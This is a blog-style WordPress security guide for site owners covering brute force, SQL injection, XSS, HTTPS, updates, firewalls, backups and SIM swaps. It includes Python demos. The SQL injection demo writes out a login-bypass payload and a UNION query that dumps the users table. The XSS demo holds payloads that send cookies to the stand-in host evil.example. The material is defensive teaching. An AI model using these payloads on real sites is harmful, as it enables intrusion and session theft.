Website security is a difficult subject to discuss because it is very technical. When you don’t think you’ll understand a topic, your brain tends to turn off, and you assume in advance that you won’t get it. So, please TURN ON your mind, because you CAN understand this subject, and you need to understand it, on some level, to protect yourself and your customers.
Most people don’t understand why anyone would WANT to hack their website. The fact is that a website is just a portal intruders exploit to meet their goals. They aren’t targeting you personally. An unsecured website is an easy target, so those are the first ones attacked. I want you to do your best not to be one of the easy ones.
Here are some of the most common types of attack.
Brute Force Attacks
Jeff Petters of Varonis says:
“A Brute Force Attack is the equivalent of trying every key on your key ring, and eventually finding the right one.”
Most brute force attacks are carried out by programs, not humans. Therefore, they can generate thousands of tries in a matter of seconds. The primary goal of a brute force attack is to gain Admin access to your website. They can only carry out their secondary goals with Admin access. Here are some of the things you can do to protect against brute force attacks:
- Do NOT use “Admin” as your user name. Some of the other user names you should avoid are “webmaster” and any derivative of your domain name.
- Use a LONG and COMPLEX password. The longer and more complex your password is, the more guesses a brute force program has to make before it finds the right one. Length matters most: a passphrase of several unrelated words beats a short password dressed up with symbols.
- Limit login attempts. Most firewall programs will allow you to set the number of attempts. I usually set them at 3. That is enough for a human to realize something is wrong and adjust.
- Use multi-factor authentication (2FA). I recommend you use 2FA with a phone application rather than SMS or Text verification (more about that later).
Another form of brute force attack, called credential stuffing, uses user names and passwords leaked in other companies’ data breaches. Believe it or not, there are lists of these credentials for sale on the “dark web,” and the attack works whenever you reused the same password on your website.
- If you have been notified that your credentials are part of a data breach, make sure you change your password as soon as possible.
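To show what “limit login attempts” and “check for breached passwords” actually do behind the scenes, here is an added example of my own, not code from the original article and not how any particular firewall plugin is written. It is Python standing in for the PHP that WordPress would run; the account, the attacker IP, the fake clock and the tiny “breached password” list are all constructed for the demonstration, and the 15-minute lockout is my assumption.

```python
import hashlib
import time
from collections import defaultdict

MAX_ATTEMPTS = 3           # the "3 attempts" setting discussed above
LOCKOUT_SECONDS = 15 * 60  # assumption: a 15-minute lockout

# Constructed stand-in for a breached-password corpus (for example a
# Have I Been Pwned download). Real lists hold hundreds of millions of hashes.
BREACHED_SHA1 = {
    hashlib.sha1(p.encode()).hexdigest().upper()
    for p in ("password", "123456", "admin123", "letmein")
}


def password_is_breached(password: str) -> bool:
    """True if the password appears in the breach corpus.
    Mirrors the k-anonymity lookup HIBP's range API uses: the first five hex
    characters of the SHA-1 pick a bucket, the remaining suffix is compared."""
    digest = hashlib.sha1(password.encode()).hexdigest().upper()
    prefix, suffix = digest[:5], digest[5:]
    bucket = {h[5:] for h in BREACHED_SHA1 if h.startswith(prefix)}
    return suffix in bucket


class LoginGuard:
    """Counts failed logins per (client IP, username) and locks that pair out
    after MAX_ATTEMPTS failures, so a bot gets three guesses, not thousands."""

    def __init__(self, clock=time.monotonic):
        self.clock = clock
        self.failures = defaultdict(int)   # key -> consecutive failures
        self.locked_until = {}             # key -> time the lockout ends

    @staticmethod
    def _key(ip, username):
        return (ip, username.lower())

    def is_locked(self, ip, username):
        key = self._key(ip, username)
        until = self.locked_until.get(key)
        if until is None:
            return False
        if self.clock() >= until:          # lockout expired: reset counters
            del self.locked_until[key]
            self.failures.pop(key, None)
            return False
        return True

    def attempt(self, ip, username, password, check_credentials):
        """Returns 'locked', 'ok' or 'denied'. check_credentials stands in for
        the CMS's own password check (wp_authenticate() in WordPress)."""
        key = self._key(ip, username)
        if self.is_locked(ip, username):
            return "locked"                # rejected before any password check
        if check_credentials(username, password):
            self.failures.pop(key, None)
            return "ok"
        self.failures[key] += 1
        if self.failures[key] >= MAX_ATTEMPTS:
            self.locked_until[key] = self.clock() + LOCKOUT_SECONDS
        return "denied"


def demo():
    """Simulate a bot guessing at one account, then a retry after the lockout."""
    users = {"editor": "correct horse battery staple"}   # constructed account
    now = [1000.0]                                        # fake clock we can advance
    guard = LoginGuard(clock=lambda: now[0])
    check = lambda u, p: users.get(u) == p
    outcomes = []
    for guess in ("admin123", "123456", "password",
                  "correct horse battery staple",        # right password, but locked out
                  "letmein"):
        outcomes.append(guard.attempt("203.0.113.7", "editor", guess, check))
    now[0] += LOCKOUT_SECONDS                             # wait out the lockout
    outcomes.append(guard.attempt("203.0.113.7", "editor",
                                  "correct horse battery staple", check))
    return outcomes


if __name__ == "__main__":
    print(demo())
    print(password_is_breached("password"), password_is_breached("correct horse battery staple"))
```

Two things worth noticing: the fourth guess is the correct password and is still refused, because the lockout is checked before the password, which is exactly what makes a three-attempt limit effective against a program making thousands of tries; and the breach check keys on the password alone, so a password that is correct for your site but also sits in a leaked list should still be rejected at the time the user sets it.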
Plugin Vulnerabilities
Plugins are the element most likely to contain vulnerabilities. Plugins can be dangerous as well as helpful, and it is easy to overlook the fact that they introduce code into your website, code that can perform actions which have nothing to do with their description.
“An example of this was flagged recently. Plugin “401 to 303” was found to be injecting ads into sites that were visible to search engines but not visitors. This technique is called ‘cloaking’ and is banned by Google.”
SQL Injection
WordPress is a CMS that stores everything in a MySQL database. In an SQL injection attack, the attacker types SQL fragments into a form field or URL that a careless plugin or theme pastes straight into a database query. That lets them bypass the website’s authentication and read the contents of the database, and once they’re in, they can add, modify, and delete records as well.
According to Acunetix:
SQL Injection attacks are one of the oldest, most prevalent, and most dangerous web application vulnerabilities.
- Make sure you use Captcha on all your forms. It keeps bots from hammering them, but it does not fix an injectable query; the real fix is in the code, where every query that includes user input must use prepared statements ($wpdb->prepare() in WordPress), so prefer plugins from developers who do that.
- Turn off database error displays using Firewall software like WPMU Defender.
Developers often leave PHP’s built-in error display turned on (WP_DEBUG and display_errors), which prints code errors on the front end of your website. It’s useful during active development, but on a live site it hands attackers table names, file paths, and the shape of your queries: yet another way to find loopholes in your site’s security.
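To make the mechanism concrete, here is an added example of my own, not code from the original article and not WordPress’s own code. Python with SQLite stands in for PHP and MySQL, the users and posts tables with their rows are constructed for the demonstration, and SHA-256 is a stand-in for the password hashing WordPress really uses. The vulnerable functions paste user input into the SQL text; the fixed ones use placeholders, which is what $wpdb->prepare() does in WordPress.

```python
import hashlib
import sqlite3


def hash_pw(password: str) -> str:
    """Stand-in for WordPress's password hashing (it uses phpass/bcrypt);
    the injection works the same way whatever the hash function is."""
    return hashlib.sha256(password.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the wp_users / wp_posts tables, constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
        CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
    """)
    conn.executemany("INSERT INTO users (user_login, user_pass) VALUES (?, ?)",
                     [("admin", hash_pw("s3cret-admin-pw")),
                      ("editor", hash_pw("correct horse battery staple"))])
    conn.executemany("INSERT INTO posts (title, body) VALUES (?, ?)",
                     [("Hello world", "First post"),
                      ("Store hours", "Open 9 to 5")])
    conn.commit()
    return conn


# --- vulnerable: user input pasted straight into the SQL text --------------

def vulnerable_login(conn, username, password) -> bool:
    sql = (f"SELECT id FROM users WHERE user_login = '{username}' "
           f"AND user_pass = '{hash_pw(password)}'")
    return conn.execute(sql).fetchone() is not None


def vulnerable_search(conn, term):
    sql = f"SELECT title, body FROM posts WHERE title LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


# --- fixed: placeholders, so the driver sends input as data, never as SQL ---
# (WordPress equivalent: $wpdb->prepare("... WHERE title LIKE %s", $term))

def safe_login(conn, username, password) -> bool:
    sql = "SELECT id FROM users WHERE user_login = ? AND user_pass = ?"
    return conn.execute(sql, (username, hash_pw(password))).fetchone() is not None


def safe_search(conn, term):
    sql = "SELECT title, body FROM posts WHERE title LIKE ?"
    return conn.execute(sql, (f"%{term}%",)).fetchall()


# Payloads an attacker would type into the login box and the search box.
BYPASS_USERNAME = "admin' --"    # the -- comments out the password check
DUMP_TERM = "x' UNION SELECT user_login, user_pass FROM users --"


def demo():
    """Run both payloads against the vulnerable and the fixed code."""
    conn = make_db()
    return {
        "vulnerable_bypass": vulnerable_login(conn, BYPASS_USERNAME, "not-the-password"),
        "safe_bypass": safe_login(conn, BYPASS_USERNAME, "not-the-password"),
        "vulnerable_dump": sorted(vulnerable_search(conn, DUMP_TERM)),
        "safe_dump": safe_search(conn, DUMP_TERM),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

With the vulnerable login, the query becomes `... WHERE user_login = 'admin' --' AND user_pass = '...'`, so the password comparison is commented away and the attacker is admin without knowing any password. With the vulnerable search, the UNION bolts the users table onto the results, which is the “retrieve the content of the SQL database” step described above; the fixed versions treat the same input as a literal string and return nothing.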
Cross Site Scripting (XSS)
Infosec Institute says:
Security researchers have found this vulnerability in most of the popular websites, including Google, Facebook, Amazon, PayPal, and many others. If you look at the bug bounty program closely, most of the reported issues belong to XSS.
XSS can happen anywhere in an application where user input is accepted and then written back into a page without being properly encoded. Search fields are a common example: the term you typed is echoed on the results page.
- A firewall such as Wordfence blocks many known XSS payloads and is a worthwhile layer, but the real fix is in the code: every value echoed into a page has to be escaped for the place it lands (esc_html() and esc_attr() in WordPress).
- You should also be careful when selecting plugins for your website, since a plugin that echoes input unescaped puts that hole in your site.
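Here is an added example of my own (not code from the article, and not how Wordfence or WordPress is written) showing what “properly encoded” means for a search page that echoes the user’s term in two places. Python’s html.escape stands in for WordPress’s esc_html() and esc_attr(); the page template, the three payloads, and the toy signature rule are all constructed for the demonstration.

```python
import html

# Two places a search page echoes the user's term: inside the input box's
# value attribute, and in the "Results for" text. Both are injection points.
PAGE = ('<form><input name="s" value="{attr}"></form>\n'
        '<p>Results for: {text}</p>')


def render_vulnerable(term: str) -> str:
    """Echoes the term raw: whatever the user typed becomes part of the HTML."""
    return PAGE.format(attr=term, text=term)


def render_safe(term: str) -> str:
    """Encodes for the HTML text and attribute contexts. html.escape with
    quote=True turns <, >, &, " and ' into entities, so the browser shows the
    characters instead of parsing them. WordPress: esc_html() / esc_attr()."""
    escaped = html.escape(term, quote=True)
    return PAGE.format(attr=escaped, text=escaped)


def naive_waf_blocks(term: str) -> bool:
    """A toy signature rule of the kind a firewall applies before the request
    reaches the application: block anything containing '<script'. Constructed
    here to show why a signature alone is not the fix."""
    return "<script" in term.lower()


# Constructed payloads (evil.example is a placeholder domain).
SCRIPT_PAYLOAD = '<script>document.location="https://evil.example/?c="+document.cookie</script>'
IMG_PAYLOAD = '<img src=x onerror="fetch(\'https://evil.example/?c=\'+document.cookie)">'
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.domain)'


def demo():
    """Does each payload get past the toy firewall, and is it live in each page?"""
    return {
        "script_blocked_by_waf": naive_waf_blocks(SCRIPT_PAYLOAD),
        "img_blocked_by_waf": naive_waf_blocks(IMG_PAYLOAD),
        "img_live_when_unescaped": "<img " in render_vulnerable(IMG_PAYLOAD),
        "img_live_when_escaped": "<img " in render_safe(IMG_PAYLOAD),
        # the quote in ATTR_PAYLOAD closes the value attribute in the raw page
        "attr_broken_out_unescaped": 'value="" autofocus' in render_vulnerable(ATTR_PAYLOAD),
        "attr_broken_out_escaped": 'value="" autofocus' in render_safe(ATTR_PAYLOAD),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
    print(render_safe(ATTR_PAYLOAD))
```

The signature rule stops the obvious `<script>` payload but lets the `<img onerror>` one through, and the attribute payload never needs a tag at all: it just closes the quote and adds an event handler. Escaping neutralizes all three, which is why it is the fix and the firewall is the extra layer.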
Use HTTPS for your website
Emily Schechter, Product Manager on the Chrome Security team, says:
“If you type HTTPS://google.com into a web browser you can be sure you are talking to the real Google.com, not a fake Google.com. It also means that no attacker on the network can see or modify any of the traffic.”
Let’s Encrypt makes it very easy to obtain a free TLS certificate and keep it renewed, and many hosting control panels will set it up for you.
Update your software
Updating your software should be #1 on your list of things to do. Most update packages fix software bugs that leave your website open to attack, and once a fix is public, attackers scan for sites that haven’t applied it yet. Make sure your plugins, your WordPress version, and your PHP version are all up-to-date. I use WPMU Automate software to auto-update all plugins and WordPress on the websites I maintain.
Install a Firewall
Wordfence is the most popular WordPress firewall, with over 100 million downloads. It includes an endpoint firewall (it runs inside WordPress itself, so it sees each request the way your site sees it) and a malware scanner. The Wordfence team keeps up with the newest firewall rules, malware signatures, and malicious IP addresses. There is a free and a paid version. The most significant difference is that the paid version gets new rules in real time: when the team finds a new attack, they push the rule to paid members immediately, and the free version receives it 30 days later.
I also recommend that you follow the Wordfence Podcast, Think like a Hacker. It is published every few days, and there is a wealth of information. I have learned a lot by just listening to this podcast. They don’t only discuss website vulnerabilities. They also discuss mobile phone issues and other internet issues.
Episode 12 of Think like a Hacker is an excellent example of this great production. I encourage you to listen or watch.
Backup your website
Ensure that you have a good backup strategy. Back up offsite; in other words, don’t store your backup on your server, because an attacker who owns the server owns the backup too. It should be an offsite location, and you should try restoring from it once so you know it works before you need it. I use the premium version of Updraft Plus. It not only allows you to back up to many different offsite locations, but it will also allow you to restore quickly.
Why not SMS or Text Verification?
A SIM swap attack is when someone takes over your phone number, and with it your text messages. A cryptocurrency investor is suing his carrier, claiming that a SIM swap resulted in the theft of $23.8 million worth of tokens. Don’t think that you are immune just because you don’t use cryptocurrency: any account that resets its password or confirms logins by text message is exposed the same way. I encourage you to read the article by Wired Magazine or listen to Episode 17 of Think like a Hacker.
Wired Magazine says:
“At its most basic level, a SIM swap is when someone convinces your carrier to switch your phone number over to a SIM card they own. They’re not doing it for prank call cover, or to rack up long-distance charges. By diverting your incoming messages, scammers can easily complete the text-based two-factor authentication checks that protect your most sensitive accounts.”
We have covered a lot of information, and I’m sure your mind is reeling, as mine was after a month of research on this subject. If you have more questions or would like to chat more about these topics I hope you’ll come to see me at Barnes & Noble, Fridays at noon.